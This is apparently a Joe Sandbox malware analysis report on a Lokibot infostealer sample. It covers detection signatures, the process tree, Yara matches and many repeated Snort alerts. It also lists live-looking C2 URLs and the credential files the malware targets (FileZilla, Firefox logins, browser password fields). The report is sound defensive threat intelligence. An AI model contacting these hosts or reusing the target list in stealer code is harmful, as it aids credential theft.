Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zlP981oop5.exe

Overview

General Information

Sample Name:zlP981oop5.exe
Analysis ID:778229
MD5:29296ef70f898c80b0dafee4e1ca5998
SHA1:adc3d1cd691332135cf391371cb1fa8ea2d4d4e7
SHA256:9b177dcbfca54547e5463b68394e110cf7ae94aadadfb71e574d7dbd400b606b
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • zlP981oop5.exe (PID: 4516 cmdline: C:\Users\user\Desktop\zlP981oop5.exe MD5: 29296EF70F898C80B0DAFEE4E1CA5998)
    • gblqfiy.exe (PID: 5172 cmdline: "C:\Users\user\AppData\Local\Temp\gblqfiy.exe" C:\Users\user\AppData\Local\Temp\rznkfgz.rq MD5: B51AF47CC81518E4CF1128FBBEAE5877)
      • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • gblqfiy.exe (PID: 5316 cmdline: C:\Users\user\AppData\Local\Temp\gblqfiy.exe MD5: B51AF47CC81518E4CF1128FBBEAE5877)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
          • 0x17936:$f1: FileZilla\recentservers.xml
          • 0x17976:$f2: FileZilla\sitemanager.xml
          • 0x15be6:$b2: Mozilla\Firefox\Profiles
          • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
          • 0x15afa:$s4: logins.json
          • 0x169a4:$s6: wand.dat
          • 0x15424:$a1: username_value
          • 0x15414:$a2: password_value
          • 0x15a5f:$a3: encryptedUsername
          • 0x15acc:$a3: encryptedUsername
          • 0x15a72:$a4: encryptedPassword
          • 0x15ae0:$a4: encryptedPassword
          00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          Click to see the 26 entries
          SourceRuleDescriptionAuthorStrings
          1.2.gblqfiy.exe.a00000.1.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            1.2.gblqfiy.exe.a00000.1.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            1.2.gblqfiy.exe.a00000.1.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            1.2.gblqfiy.exe.a00000.1.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            1.2.gblqfiy.exe.a00000.1.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 39 entries
            No Sigma rule has matched
            Timestamp:192.168.2.3171.22.30.14749901802021641 01/05/23-08:53:11.357263
            SID:2021641
            Source Port:49901
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749708802024318 01/05/23-08:52:10.789251
            SID:2024318
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749962802021641 01/05/23-08:53:29.855666
            SID:2021641
            Source Port:49962
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750036802024318 01/05/23-08:53:51.046851
            SID:2024318
            Source Port:50036
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749708802024313 01/05/23-08:52:10.789251
            SID:2024313
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749769802024318 01/05/23-08:52:30.825016
            SID:2024318
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749900802825766 01/05/23-08:53:10.997847
            SID:2825766
            Source Port:49900
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498192025483 01/05/23-08:52:46.374891
            SID:2025483
            Source Port:80
            Destination Port:49819
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500282025483 01/05/23-08:53:48.934068
            SID:2025483
            Source Port:80
            Destination Port:50028
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750008802024313 01/05/23-08:53:42.094852
            SID:2024313
            Source Port:50008
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749933802825766 01/05/23-08:53:20.043516
            SID:2825766
            Source Port:49933
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749994802825766 01/05/23-08:53:38.408241
            SID:2825766
            Source Port:49994
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749934802021641 01/05/23-08:53:20.304475
            SID:2021641
            Source Port:49934
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750003802024318 01/05/23-08:53:40.763519
            SID:2024318
            Source Port:50003
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750069802024313 01/05/23-08:53:59.913079
            SID:2024313
            Source Port:50069
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749736802024318 01/05/23-08:52:21.543284
            SID:2024318
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750064802024318 01/05/23-08:53:58.597698
            SID:2024318
            Source Port:50064
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750019802025381 01/05/23-08:53:45.311637
            SID:2025381
            Source Port:50019
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750008802024318 01/05/23-08:53:42.094852
            SID:2024318
            Source Port:50008
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750064802024313 01/05/23-08:53:58.597698
            SID:2024313
            Source Port:50064
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499102025483 01/05/23-08:53:13.814649
            SID:2025483
            Source Port:80
            Destination Port:49910
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749797802024313 01/05/23-08:52:40.255110
            SID:2024313
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749736802024313 01/05/23-08:52:21.543284
            SID:2024313
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749797802024318 01/05/23-08:52:40.255110
            SID:2024318
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749810802825766 01/05/23-08:52:43.863274
            SID:2825766
            Source Port:49810
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499402025483 01/05/23-08:53:21.975366
            SID:2025483
            Source Port:80
            Destination Port:49940
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749967802021641 01/05/23-08:53:31.230819
            SID:2021641
            Source Port:49967
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497942025483 01/05/23-08:52:39.518919
            SID:2025483
            Source Port:80
            Destination Port:49794
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499512025483 01/05/23-08:53:25.015955
            SID:2025483
            Source Port:80
            Destination Port:49951
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750031802024313 01/05/23-08:53:49.661487
            SID:2024313
            Source Port:50031
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749703802024318 01/05/23-08:52:08.565296
            SID:2024318
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750031802024318 01/05/23-08:53:49.661487
            SID:2024318
            Source Port:50031
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750036802024313 01/05/23-08:53:51.046851
            SID:2024313
            Source Port:50036
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749905802825766 01/05/23-08:53:12.409052
            SID:2825766
            Source Port:49905
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499922025483 01/05/23-08:53:37.966887
            SID:2025483
            Source Port:80
            Destination Port:49992
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749731802024318 01/05/23-08:52:20.113614
            SID:2024318
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749843802825766 01/05/23-08:52:54.266621
            SID:2825766
            Source Port:49843
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749731802024313 01/05/23-08:52:20.113614
            SID:2024313
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749714802025381 01/05/23-08:52:13.349412
            SID:2025381
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500172025483 01/05/23-08:53:44.615644
            SID:2025483
            Source Port:80
            Destination Port:50017
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749811802021641 01/05/23-08:52:44.140113
            SID:2021641
            Source Port:49811
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749815802825766 01/05/23-08:52:45.213789
            SID:2825766
            Source Port:49815
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750014802025381 01/05/23-08:53:43.719267
            SID:2025381
            Source Port:50014
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749931802025381 01/05/23-08:53:19.484274
            SID:2025381
            Source Port:49931
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749792802024313 01/05/23-08:52:38.887901
            SID:2024313
            Source Port:49792
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749792802024318 01/05/23-08:52:38.887901
            SID:2024318
            Source Port:49792
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749876802825766 01/05/23-08:53:03.175112
            SID:2825766
            Source Port:49876
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749747802025381 01/05/23-08:52:24.577114
            SID:2025381
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749816802021641 01/05/23-08:52:45.483412
            SID:2021641
            Source Port:49816
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750075802025381 01/05/23-08:54:01.517358
            SID:2025381
            Source Port:50075
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497532025483 01/05/23-08:52:26.405615
            SID:2025483
            Source Port:80
            Destination Port:49753
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749719802025381 01/05/23-08:52:15.841614
            SID:2025381
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749920802024313 01/05/23-08:53:16.511672
            SID:2024313
            Source Port:49920
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750047802025381 01/05/23-08:53:54.007519
            SID:2025381
            Source Port:50047
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749742802025381 01/05/23-08:52:23.189713
            SID:2025381
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749782802021641 01/05/23-08:52:36.098088
            SID:2021641
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497342025483 01/05/23-08:52:21.057098
            SID:2025483
            Source Port:80
            Destination Port:49734
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497642025483 01/05/23-08:52:29.564114
            SID:2025483
            Source Port:80
            Destination Port:49764
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749903802025381 01/05/23-08:53:11.877542
            SID:2025381
            Source Port:49903
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749920802024318 01/05/23-08:53:16.511672
            SID:2024318
            Source Port:49920
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750070802025381 01/05/23-08:54:00.166694
            SID:2025381
            Source Port:50070
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749871802825766 01/05/23-08:53:01.829225
            SID:2825766
            Source Port:49871
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500692025483 01/05/23-08:53:59.993977
            SID:2025483
            Source Port:80
            Destination Port:50069
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749990802021641 01/05/23-08:53:37.383838
            SID:2021641
            Source Port:49990
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497752025483 01/05/23-08:52:32.764869
            SID:2025483
            Source Port:80
            Destination Port:49775
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749995802021641 01/05/23-08:53:38.676723
            SID:2021641
            Source Port:49995
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750069802024318 01/05/23-08:53:59.913079
            SID:2024318
            Source Port:50069
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750016802825766 01/05/23-08:53:44.267939
            SID:2825766
            Source Port:50016
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497232025483 01/05/23-08:52:17.901079
            SID:2025483
            Source Port:80
            Destination Port:49723
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497122025483 01/05/23-08:52:12.517516
            SID:2025483
            Source Port:80
            Destination Port:49712
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500582025483 01/05/23-08:53:57.081819
            SID:2025483
            Source Port:80
            Destination Port:50058
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749764802024313 01/05/23-08:52:29.472789
            SID:2024313
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750042802025381 01/05/23-08:53:52.687057
            SID:2025381
            Source Port:50042
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497012025483 01/05/23-08:52:07.816134
            SID:2025483
            Source Port:80
            Destination Port:49701
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749769802024313 01/05/23-08:52:30.825016
            SID:2024313
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499702025483 01/05/23-08:53:32.118296
            SID:2025483
            Source Port:80
            Destination Port:49970
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499812025483 01/05/23-08:53:35.036033
            SID:2025483
            Source Port:80
            Destination Port:49981
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500472025483 01/05/23-08:53:54.088522
            SID:2025483
            Source Port:80
            Destination Port:50047
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749764802024318 01/05/23-08:52:29.472789
            SID:2024318
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749848802825766 01/05/23-08:52:55.640788
            SID:2825766
            Source Port:49848
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749977802024318 01/05/23-08:53:33.899852
            SID:2024318
            Source Port:49977
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749777802825766 01/05/23-08:52:34.550245
            SID:2825766
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500092025483 01/05/23-08:53:42.451776
            SID:2025483
            Source Port:80
            Destination Port:50009
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749717802021641 01/05/23-08:52:14.673219
            SID:2021641
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749786802825766 01/05/23-08:52:37.217550
            SID:2825766
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500062025483 01/05/23-08:53:41.632805
            SID:2025483
            Source Port:80
            Destination Port:50006
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749726802021641 01/05/23-08:52:18.702884
            SID:2021641
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749916802024318 01/05/23-08:53:15.372296
            SID:2024318
            Source Port:49916
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749925802024313 01/05/23-08:53:17.874226
            SID:2024313
            Source Port:49925
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750021802021641 01/05/23-08:53:46.361205
            SID:2021641
            Source Port:50021
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750044802825766 01/05/23-08:53:53.227481
            SID:2825766
            Source Port:50044
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749916802024313 01/05/23-08:53:15.372296
            SID:2024313
            Source Port:49916
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750053802825766 01/05/23-08:53:55.636070
            SID:2825766
            Source Port:50053
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749754802021641 01/05/23-08:52:26.655822
            SID:2021641
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749813802025381 01/05/23-08:52:44.686594
            SID:2025381
            Source Port:49813
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749944802024318 01/05/23-08:53:23.021157
            SID:2024318
            Source Port:49944
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749745802021641 01/05/23-08:52:24.023320
            SID:2021641
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749749802825766 01/05/23-08:52:25.162571
            SID:2825766
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750078802021641 01/05/23-08:54:02.320663
            SID:2021641
            Source Port:50078
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749969802025381 01/05/23-08:53:31.782144
            SID:2025381
            Source Port:49969
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749804802025381 01/05/23-08:52:42.167879
            SID:2025381
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498792025483 01/05/23-08:53:04.056744
            SID:2025483
            Source Port:80
            Destination Port:49879
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749802802024313 01/05/23-08:52:41.641382
            SID:2024313
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498682025483 01/05/23-08:53:01.111667
            SID:2025483
            Source Port:80
            Destination Port:49868
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750072802825766 01/05/23-08:54:00.683642
            SID:2825766
            Source Port:50072
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749898802025381 01/05/23-08:53:09.845609
            SID:2025381
            Source Port:49898
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749944802024313 01/05/23-08:53:23.021157
            SID:2024313
            Source Port:49944
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750012802021641 01/05/23-08:53:43.190304
            SID:2021641
            Source Port:50012
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750025802825766 01/05/23-08:53:48.086655
            SID:2825766
            Source Port:50025
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497042025483 01/05/23-08:52:09.015467
            SID:2025483
            Source Port:80
            Destination Port:49704
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749986802024318 01/05/23-08:53:36.285692
            SID:2024318
            Source Port:49986
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749986802024313 01/05/23-08:53:36.285692
            SID:2024313
            Source Port:49986
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749773802021641 01/05/23-08:52:31.909319
            SID:2021641
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500392025483 01/05/23-08:53:51.948003
            SID:2025483
            Source Port:80
            Destination Port:50039
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749821802024313 01/05/23-08:52:46.829983
            SID:2024313
            Source Port:49821
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749841802025381 01/05/23-08:52:53.743125
            SID:2025381
            Source Port:49841
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749844802021641 01/05/23-08:52:54.549139
            SID:2021641
            Source Port:49844
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749988802025381 01/05/23-08:53:36.817903
            SID:2025381
            Source Port:49988
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749775802025381 01/05/23-08:52:32.683406
            SID:2025381
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750059802021641 01/05/23-08:53:57.279795
            SID:2021641
            Source Port:50059
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749821802024318 01/05/23-08:52:46.829983
            SID:2024318
            Source Port:49821
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749939802021641 01/05/23-08:53:21.632432
            SID:2021641
            Source Port:49939
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749999802825766 01/05/23-08:53:39.715844
            SID:2825766
            Source Port:49999
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749887802024318 01/05/23-08:53:06.117016
            SID:2024318
            Source Port:49887
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498082025483 01/05/23-08:52:43.407695
            SID:2025483
            Source Port:80
            Destination Port:49808
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749887802024313 01/05/23-08:53:06.117016
            SID:2024313
            Source Port:49887
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749703802024313 01/05/23-08:52:08.565296
            SID:2024313
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749859802024313 01/05/23-08:52:58.622571
            SID:2024313
            Source Port:49859
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749756802025381 01/05/23-08:52:27.231494
            SID:2025381
            Source Port:49756
